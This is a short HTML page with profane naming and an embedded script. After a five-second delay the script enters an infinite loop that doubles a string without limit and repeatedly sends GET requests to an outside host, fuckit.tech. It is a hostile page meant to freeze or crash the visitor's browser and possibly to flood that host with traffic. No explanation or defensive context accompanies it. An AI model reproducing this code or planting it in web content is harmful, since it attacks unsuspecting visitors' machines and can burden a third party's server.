<body id="body">
    
</body>
<style>
  body {
    background-image: url("fuckit.jpg");
        background-size: cover;
        background-size: contain;
  }
</style>
<script>
var getFucked = "steeeeeeeeeeeeleledouglassssssss"
var millisecondsToWait = 5000;
setTimeout(function() {
    while(true){
    document.getElementById("body").classList.add("oof");
    getFucked += getFucked;
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
        }
    };
    xhttp.open("GET", "http://fuckit.tech");
    xhttp.send();
    xhttp.open("GET", "http://fuckit.tech");
    xhttp.send();
    xhttp.open("GET", "http://fuckit.tech");
    xhttp.send();
    xhttp.open("GET", "http://fuckit.tech");
    xhttp.send();
}
}, millisecondsToWait);
</script>
